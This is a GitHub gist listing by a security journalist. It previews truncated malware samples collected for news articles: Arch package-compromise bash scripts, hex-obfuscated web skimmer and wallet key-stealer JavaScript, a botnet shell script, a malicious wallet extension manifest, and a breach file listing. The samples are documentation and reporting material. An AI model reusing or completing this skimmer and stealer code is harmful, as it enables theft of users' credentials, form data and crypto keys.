I hereby claim:
- I am campuscodi on github.
- I am campuscodi (https://keybase.io/campuscodi) on keybase.
- I have a public key whose fingerprint is 6D57 4440 C898 2C79 61A4 BC53 7BA9 4AAE 2B9B FA3A
To claim this, I am signing this object:
Catalin Cimpanu campuscodi
🕊️
campuscodi
/ keybase.md
Created
November 27, 2017 13:43
campuscodi
/ ~u
Created
July 10, 2018 20:49
~u file downloaded as 2nd stage payload in public Arch package compromise
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| function urle() { | |
| sed -e 's|!|%21|' -e 's|#|%23|' -e 's|$|%24|' -e 's|&|%26|' -e "s|'|%27|" -e 's|(|%28|' -e 's|)|%29|' -e 's|*|%2a|' -e 's|+|%2b|' -e 's|,|%2c|' -e 's|/|%2f|' -e 's|:|%3a|' -e 's|;|%3b|' -e 's|=|%3d|' -e 's|?|%3f|' -e 's|@|%40|' -e 's|\[|%5b|' -e 's|]|%5d|' | |
| } | |
| declare -fx urle | |
| GID= | |
| MACHINE_ID="$(cat /etc/machine-id)" | |
| PASTE_TITLE="$(echo [xeactor]\ $MACHINE_ID|urle)" | |
| upload() { |
campuscodi
/ gist:74d0d2e35d8fd9499c76333ce027345a
Created
July 10, 2018 20:49
~x file downloaded in public Arch package compromise
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # get to the right location | |
| if [[ -n "$pkgdir" ]]; then | |
| cd "$pkgdir" | |
| else | |
| exit 0 | |
| fi | |
| be_silent() { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var _0xeb25=["\x68\x74\x74\x70\x73\x3A\x2F\x2F\x69\x6E\x66\x6F\x2D\x73\x74\x61\x74\x2E\x77\x73\x2F\x6A\x73\x2F\x73\x6C\x69\x64\x65\x72\x2E\x6A\x73","\x73\x65\x74\x69\x64\x64","\x28\x3F\x3A\x5E\x7C\x3B\x20\x29","\x5C\x24\x31","\x72\x65\x70\x6C\x61\x63\x65","\x3D\x28\x5B\x5E\x3B\x5D\x2A\x29","\x6D\x61\x74\x63\x68","\x63\x6F\x6F\x6B\x69\x65","\x67\x65\x74\x54\x69\x6D\x65","\x2D","\x72\x61\x6E\x64\x6F\x6D","\x66\x6C\x6F\x6F\x72","\x73\x65\x74\x69\x64\x64\x3D","\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x73\x6E\x64","\x69\x6E\x70\x75\x74\x2C\x20\x73\x65\x6C\x65\x63\x74\x2C\x20\x74\x65\x78\x74\x61\x72\x65\x61\x2C\x20\x63\x68\x65\x63\x6B\x62\x6F\x78\x2C\x20\x62\x75\x74\x74\x6F\x6E","\x71\x75\x65\x72\x79\x53\x65\x6C\x65\x63\x74\x6F\x72\x41\x6C\x6C","\x6C\x65\x6E\x67\x74\x68","\x76\x61\x6C\x75\x65","\x6E\x61\x6D\x65","","\x3D","\x26","\x61\x5B\x68\x72\x65\x66\x2A\x3D\x27\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x76\x6F\x69\x64\x28\x30\x |
campuscodi
/ Volusion code
Created
October 8, 2019 17:45
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /*! | |
| * JavaScript Cookie v2.2.1 | |
| * https://github.com/js-cookie/js-cookie | |
| * | |
| * Copyright 2006, 2015 Klaus Hartl & Fagner Brack | |
| * Released under the MIT license | |
| */ | |
| ; | |
| (function(factory) { | |
| var registeredInModuleLoader; |
campuscodi
/ 1XQa.sh
Created
November 26, 2019 00:41
Malware campaign. See here: https://twitter.com/bad_packets/status/1199087675833085959
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| resetsshgo(){ | |
| if [ "$needreset" -eq "0" ]; | |
| then | |
| echo "no need" | |
| else | |
| sleep 10; | |
| /etc/init.d/ssh restart; | |
| /etc/init.d/sshd restart; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var _0xbe53=["\x68\x6F\x73\x74\x6E\x61\x6D\x65","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x77\x77\x77\x2E\x6D\x79\x65\x74\x68\x65\x72\x77\x61\x6C\x6C\x65\x74\x2E\x63\x6F\x6D","\x6C\x65\x6E\x67\x74\x68","\x69\x6E\x70\x75\x74\x5B\x6E\x61\x6D\x65\x3D\x27\x50\x72\x69\x76\x61\x74\x65\x4B\x65\x79\x27\x5D","\x70\x61\x73\x74\x65","\x74\x65\x78\x74","\x67\x65\x74\x44\x61\x74\x61","\x63\x6C\x69\x70\x62\x6F\x61\x72\x64\x44\x61\x74\x61","\x6F\x72\x69\x67\x69\x6E\x61\x6C\x45\x76\x65\x6E\x74","\x63\x6B\x6B\x67\x6D\x63\x63\x65\x66\x66\x66\x6E\x62\x62\x61\x6C\x6B\x6D\x62\x62\x67\x65\x62\x62\x6F\x6A\x6A\x6F\x67\x66\x66\x6E","\x70\x76\x69\x5F\x65\x74","\x73\x65\x6E\x64\x4D\x65\x73\x73\x61\x67\x65","\x72\x75\x6E\x74\x69\x6D\x65","\x62\x69\x6E\x64","\x69\x6E\x70\x75\x74\x5B\x74\x79\x70\x65\x3D\x27\x66\x69\x6C\x65\x27\x5D","\x66\x69\x6C\x65\x73","\x74\x61\x72\x67\x65\x74","\x72\x65\x61\x64\x41\x73\x54\x65\x78\x74","","\x6F\x6E\x6C\x6F\x61\x64","\x72\x65\x73\x75\x6C\x74","\x76\x61\x6C","\x2E\x70\x61\x73\x73\x77\x6F\x72\x64\x2D\x66\x6F\ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "update_url": "https://clients2.google.com/service/update2/crx", | |
| "name": "Shitcoin Wallet", | |
| "version": "1.5.2", | |
| "description": "E-wallet is concentrated on the ERC-20 platform.", | |
| "permissions": ["activeTab", "storage", "*://*.infura.io/*", "*://*.tokenbalance.com/*", "*://erc20wallet.tk/*"], | |
| "content_security_policy": "script-src 'self' 'sha256-lMz1NqveNgzhCVSTDXZo8ufc/yD3TkT7DOemexGdrRo='; object-src 'self'", | |
| "background": { | |
| "scripts": ["jquery.js", "background.js"], |
campuscodi
/ Awake-Chrome-extension-status
Created
June 18, 2020 14:28
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| acmnokigkgihogfbeooklgemindnbine is down | |
| apgohnlmnmkblgfplgnlmkjcpocgfomp is down | |
| apjnadhmhgdobcdanndaphcpmnjbnfng is down | |
| bahkljhhdeciiaodlkppoonappfnheoi is down | |
| bannaglhmenocdjcmlkhkcciioaepfpj is down | |
| bgffinjklipdhacmidehoncomokcmjmh is down | |
| bifdhahddjbdbjmiekcnmeiffabcfjgh is down | |
| bjpknhldlbknoidifkjnnkpginjgkgnm is down | |
| blngdeeenccpfjbkolalandfmiinhkak is down | |
| ccdfhjebekpopcelcfkpgagbehppkadi is down |
campuscodi
/ DataViper JSON samples
Last active
July 15, 2020 15:12
Gist created and used for ZDNet article: https://www.zdnet.com/article/hacker-breaches-security-firm-in-act-of-revenge/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ├── 1.5m Combo.json | |
| ├── 17173.com.json | |
| ├── 178.com.json | |
| ├── 2018 voters Colorado.json | |
| ├── 2018 voters Connecticut.json | |
| ├── 2018 voters Florida.json | |
| ├── 2018 voters Kansas.json | |
| ├── 2018 voters Nevada.json | |
| ├── 2018 voters North Carolina.json | |
| ├── 2018 voters Ohio.json |
OlderNewer